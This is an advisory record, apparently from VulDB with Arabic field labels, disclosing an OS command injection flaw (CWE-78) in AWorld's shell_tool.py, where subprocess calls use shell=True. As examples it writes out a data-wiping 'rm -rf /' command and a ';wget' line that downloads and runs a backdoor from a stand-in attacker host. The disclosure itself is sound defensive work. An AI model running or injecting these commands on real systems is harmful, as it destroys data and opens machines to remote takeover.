| عنوان | inclusionAI AWorld 0.0 Command Injection |
|---|
| الوصف | AWorld is a tool designed for building, evaluating, and running General Multi-Agent Assistance. However, it contains a critical security vulnerability in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`.
The vulnerability is of the type CWE-78: OS Command Injection. The code in this file makes use of `subprocess.run()` and `subprocess.Popen()` functions to execute user input commands. The concerning aspect is that the `shell` parameter in these functions is set to `True`.
In the `execute` method, when `capture_output` is `True`, `subprocess.run()` is called with `shell=True`, and when `capture_output` is `False`, `subprocess.Popen()` is called with `shell=True`. Similarly, the `execute_async` method also calls `subprocess.Popen()` with `shell=True`.
This setting allows an attacker to inject malicious commands through user input. For instance, if an attacker supplies input like `rm -rf /` in a scenario where the application accepts user shell commands, the malicious command will be executed by the system. In more sophisticated attacks, an attacker could inject commands to download and execute a backdoor script from a remote server, such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh`, which can lead to unauthorized access and further malicious activities.
More details: https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| المصدر | ⚠️ https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| المستخدم | ybdesire (UID 83239) |
|---|
| ارسال | 16/04/2025 05:41 AM (12 أشهر منذ) |
|---|
| الاعتدال | 28/04/2025 07:56 AM (12 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 306395 [inclusionAI AWorld حتى 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|